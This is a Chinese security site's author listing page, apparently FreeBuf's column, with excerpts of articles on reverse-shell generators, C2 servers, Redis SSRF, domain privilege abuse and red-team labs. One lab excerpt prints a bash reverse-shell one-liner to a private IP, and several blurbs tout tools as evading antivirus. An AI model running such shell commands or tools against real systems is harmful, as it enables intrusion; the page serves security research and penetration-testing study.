首页
学习
活动
专区
工具
TVP
发布

FreeBuf

专栏作者
8085
文章
9119930
阅读量
349
订阅数
如何使用ShellPop实现Shell的“花式”弹出
ShellPop是一款针对Shell的管理工具,在该工具的帮助下,广大研究人员不仅可以轻松生成各种复杂的反向Shell或Bind Shell,而且还可以在渗透测试过程中实现Shell的“花式”弹出,这将极大程度地简化大家的渗透测试任务。
FB客服
2023-09-21
1620
GShell:一款灵活可扩展的跨平台Shell生成器
 关于GShell  GShell是一款功能强大且支持灵活扩展的跨平台Shell生成器,在该工具的帮助下,广大研究人员可以随意生成针对任意平台的任何Shell,并实现完全的自动化和管理控制功能。  支持的操作系统  类Unix系统 GNU/Linux Windows macOS  支持生成的Shell  Bind-Shel:目标需要有一个监听端口,然后我们连接到目标主机; 反向Shell:我们又一个监听端口,让目标连接到我们的设备;  支持的编码  URL编码:绕过URL过滤器; Base64/32/16编
FB客服
2023-03-30
4740
Tornado:一款功能强大的红队匿名反向Shell
关于Tornado  Tornado是一款功能强大的红蓝队安全研究工具,同时也一款功能强大的匿名反向Shell。该工具基于隐藏服务实现其功能,并且没有使用端口转发技术。简而言之,Tornado是一款完全无法被检测到的反向Shell工具,可以帮助广大研究人员实现渗透测试等安全分析任务。 Tornado通过Metasploit和msfvenom模块实现其功能,可以轻松为本地主机创建隐藏服务。整个过程不会涉及到跟.onion域名的端口转发。如果你使用过其他远程管理工具的话,你就知道这意味着什么了。值得一提的是,T
FB客服
2023-03-30
2380
hoaxshell:一款功能强大的非传统Windows反向Shell
 关于hoaxshell  hoaxshell是一款功能强大的非传统Windows反向Shell,当前版本的Microsoft Defender和部分反病毒解决方案基本无法检测到hoaxshell的存在。该工具易于使用,不仅可以生成其自己的PowerShell Payload,而且还可以支持加密(SSL),可以帮助广大研究人员测试Windows系统的安全性。 当前版本的hoaxshell已在最新的Windows 11企业版和Windows 10专业版进行过测试。 工具下载  广大研究人员可以使用下列命令
FB客服
2023-03-30
5400
如何使用notionterm在Notion页面中嵌入反向Shell
 关于notionterm  notionterm是一款功能强大的反向Shell嵌入工具,在该工具的帮助下,广大研究人员可以轻松向一个Notion页面中嵌入反向Shell。  工具特性  1、可以在反向Shell中隐藏我们的IP地址(研究人员和目标计算机之间没有进行直接交互,Notion将作为代理来托管反向Shell); 2、支持在报告中插入演示和PoC; 3、高可用性和可共享的反向Shell(桌面、浏览器、手机); 4、支持加密Shell和带有身份验证功能的远程Shell;  工具要求  Notion软件
FB客服
2023-03-30
1.1K0
FreeBuf 周报 | 现代汽车爆出逻辑漏洞;PyPI 包存在恶意代码
各位 Buffer 周末好,以下是本周「FreeBuf周报」,我们总结推荐了本周的热点资讯、安全事件、一周好文和省心工具,保证大家不错过本周的每一个重点! 热点资讯 1. 全球经济衰退的大环境下,对网络安全岗位影响最低 网络安全认证组织(ISC)2 的一项新研究显示,网络安全专业人员可能会比其他大多数工人更好地度过经济衰退期,因为企业高管担心经济衰退可能带来网络攻击的增加,并承认很难雇用到有知识的工人。 2. Mirai 恶意软件新变种感染 Linux 设备,以期构建 DDoS 僵尸网络 一个被追
FB客服
2023-02-24
4580
如何使用Web Shell Detector识别和检测站点中的可疑Shell脚本
 关于Web Shell Detector  Web Shell Detector是一款功能强大的PHP脚本,该脚本可以帮助广大研究人员识别、检测和发现目标站点中的可疑PHP/CGI(PERL)/ASP/ASPX Shell脚本。Web Shell Detector提供了一个“Web Shell”签名数据库,可以帮助我们识别网络中大约99%的“Web Shell”。通过使用最新的JavaScript和CSS技术,该工具成功实现了友好的用户接口和体积上的轻量级。  检测数量  当前版本的Web Shell
FB客服
2023-02-24
7640
Redis中SSRF的利用
SSRF介绍 SSRF,服务器端请求伪造,服务器请求伪造,是由攻击者构造的漏洞,用于形成服务器发起的请求。通常,SSRF攻击的目标是外部网络无法访问的内部系统。这里我们要介绍的是关于redis中SSRF的利用,如果有什么错误的地方还请师傅们不吝赐教/握拳。 前置知识 文章中的数据包构造会涉及到redis的RESP协议,所以我们这里先科普一下,了解RESP协议的师傅可以跳过=。= RESP协议 Redis服务器与客户端通过RESP(REdis Serialization Protocol
FB客服
2023-02-24
4430
黑客利用向日葵漏洞部署 Sliver C2 框架
The Hacker News 网站披露,AhnLab 安全应急响应中心发现某些网络攻击者正在利用向日葵中存在的安全漏洞,部署 Sliver C2 框架,以期开展后续“入侵攻击”活动。 安全研究人员指出,网络攻击者不仅仅使用了 Sliver 后门,还部署了 BYOVD(自带易受攻击的驱动程序)恶意软件,意图破坏安全产品并安装反向 shell。 整个攻击链条中,攻击者首先利用向日葵 v11.0.0.33 及更早版本中存在的两个远程代码执行漏洞 CNVD-2022-03672 和 CNVD-2022-1027
FB客服
2023-02-24
4170
Enumdb:一款针对MySQL和MSSQL关系型数据库的安全渗透后利用工具
关于Enumdb Enumdb是一款针对MySQL和MSSQL关系型数据库的安全渗透后利用工具,该工具主要针对关系型数据库设计,并支持暴力破解和后利用渗透测试。广大研究人员可以提供一个用户名或密码列表,该工具将会在每个主机中寻找能够匹配的有效凭证。默认配置下,Enumdb将会使用新发现的凭证信息,并通过对表或列名的关键字搜索来自动搜索敏感数据字段,最后将所有信息提取出来并写入到.csv或.xlsx输出文件中。 需要提取的数据行数、数据库/表黑名单和搜索的关键字都可以在enumdb/config.py文件中
FB客服
2023-02-24
1.1K0
从红队视角看AWD攻击
上传之后,访问该页面,就会不断生成shell.php,我们就直接可以利用shell.php。
FB客服
2023-02-16
4240
Villain:一款针对Windows和Linux的后门生成和多会话处理工具
Villain是一款针对Windows和Linux操作系统设计和开发的后门生成与多会话处理工具,该工具允许广大研究人员与兄弟服务器或其他运行了Villain的设备进行连接,并共享他们的后门会话,以方便广大研究人员和团队之间的协同工作。
FB客服
2023-02-10
4290
谈谈域渗透中常见的可滥用权限及其应用场景(二)
在谈论这篇文章的主要内容之前,我想先讲讲Bloodhound这个工具,BloodHound 是一个强大的内网域渗透提权分析工具,它把域中各种抽象的概念和结构放在了一个能运行且直观,并易于使用的图形化功能中,自动用于提取和分析数据,高效准确地显示如何提升 AD 域中的权限。它使用图形理论来自动化的在 Active Directory 环境中搞清楚大部分人员的关系和细节。我们可以使用 BloodHound 快速深入了解 AD 的一些用户关系,了解哪些用户具有管理员权限,哪些用户有权对任何计算机都拥有管理权限,以及有效的用户组成员信息。它是一个对于我们在域渗透中寻找攻击向量、规划攻击路线、进行横向移动等都有有巨大的帮助,在这篇文章中我们也会用到这款工具。
FB客服
2023-02-10
6610
Shells:一款功能强大的反向Shell快速生成工具
Shells是一款功能强大的反向Shell快速生成工具,该工具由4ndr34z负责开发和维护,可以帮助广大研究人员轻松生成常用的反向Shell。如果你需要一种简单的方法来生成格式化的PowerShell以及Python反向Shell的话,Shells这款工具将是你的不二选择。
FB客服
2023-02-10
3260
redis未授权访问漏洞的三种场景复现以及加固思路
redis未授权访问漏洞是一个由于redis服务器版本较低,并未设置登陆密码所导致的漏洞,攻击者可以直接利用redis服务器的ip地址和端口完成对redis服务器的远程登陆,对目标服务器完成后续的控制和利用。
FB客服
2023-02-09
7770
ATT&CK实战系列-红队评估(七)学习记录
Goby:bash -c 'exec bash -i &>/dev/tcp/192.168.0.133/8065 <&1'
FB客服
2022-11-14
1.1K0
PSAsyncShell:一款功能强大的PowerShell异步TCP反向Shell
PSAsyncShell是一款功能强大的PowerShell异步TCP反向Shell,该工具基于纯PowerShell开发,适用于安装并配置了PowerShell环境的设备使用。和其他反向Shell工具不同的是,该工具所实现的所有通信和执行流都是异步完成的,并实现了一些针对防火墙绕过和远程连接处理对策。
FB客服
2022-11-14
5940
GodGenesis:一款基于Python 3的TCP反向Shell C2服务器
GodGenesis是一款基于纯Python 3开发的C2服务器,该工具旨在帮助广大红队研究人员完成渗透测试任务。当前版本的GodGenesis仅支持TCP反向Shell,不过别担心,该工具还可以帮助我们从任意目标Windows设备上获取到管理员Shell。
FB客服
2022-11-14
3240
FreeBuf周报 | 美国陆军首次装备赛博态势理解软件;台湾 2300 万人民信息泄露
各位 Buffer 周末好,以下是本周「FreeBuf周报」,我们总结推荐了本周的热点资讯、安全事件、一周好文和省心工具,保证大家不错过本周的每一个重点!
FB客服
2022-11-14
4400
FreeBuf周报 | 360万+MySQL服务器暴露在互联网上;匿名者声称将对白俄罗斯发起入侵
各位 FreeBufer 周末好~以下是本周的「FreeBuf周报」,我们总结推荐了本周的热点资讯、优质文章和省心工具,保证大家不错过本周的每一个重点!
FB客服
2022-06-08
4070
点击加载更多
社区活动
Python精品学习库
代码在线跑,知识轻松学
热点技术征文第五期
新风口Sora来袭,普通人该如何把握机会?
博客搬家 | 分享价值百万资源包
自行/邀约他人一键搬运博客,速成社区影响力并领取好礼
技术创作特训营·精选知识专栏
往期视频·干货材料·成员作品·最新动态
领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档